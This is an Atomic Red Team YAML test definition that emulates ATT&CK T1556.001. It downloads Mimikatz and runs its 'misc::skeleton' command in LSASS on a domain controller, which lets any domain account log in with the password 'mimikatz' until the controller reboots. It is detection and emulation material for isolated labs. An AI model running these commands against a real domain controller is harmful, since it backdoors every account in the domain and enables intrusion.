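# Atomic Red Team test definition for ATT&CK T1556.001 (Skeleton Key via Mimikatz).
# The test injects into LSASS on a domain controller; per the description it is only
# meant for an isolated lab DC, and cleanup reboots the host to evict the key.
attack_technique: T1556.001
display_name: 'Modify Authentication Process: Domain Controller Authentication'
atomic_tests:
  - name: Skeleton Key via Mimikatz
    auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
    description: |
      Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
      user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
      This test must be run on an isolated domain controller and must not be performed on a production DC.
      Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
    supported_platforms:
      - windows
    input_arguments:
      # Windows paths are single-quoted so the backslashes are taken literally
      # regardless of the loader's escape handling.
      mimikatz_path:
        type: path
        default: 'C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe'
        description: Path to the mimikatz executable
      file_path:
        type: path
        default: 'C:\ExternalPayloads\Mimikatz\mimikatz.zip'
        description: File path where the zipped mimikatz file is downloaded to
      mimikatz_url:
        type: url
        # NOTE(review): "latest" is an unpinned release and get_prereq_command expands the
        # archive without verifying it (e.g. Get-FileHash against an expected value). If this
        # test is ever run outside a throwaway lab, pin the release and add a hash check.
        default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
        description: The URL for the mimikatz release zip
      directory_path:
        type: path
        default: 'C:\ExternalPayloads\Mimikatz'
        description: Directory path for mimikatz
    dependency_executor_name: powershell
    dependencies:
      # Quoted: a bare " #" inside a plain scalar starts a YAML comment, which would
      # silently truncate this text at "...host machine at".
      - description: 'Mimikatz must be present on the host machine at #{mimikatz_path}'
        prereq_command: |
          if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
        get_prereq_command: |
          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
    executor:
      # privilege::debug needs SeDebugPrivilege, hence elevation_required below;
      # the skeleton key persists only in LSASS memory, which is why cleanup reboots.
      command: |
        & "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
      cleanup_command: |
        Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
        Restart-Computer -Force
      name: powershell
      elevation_required: true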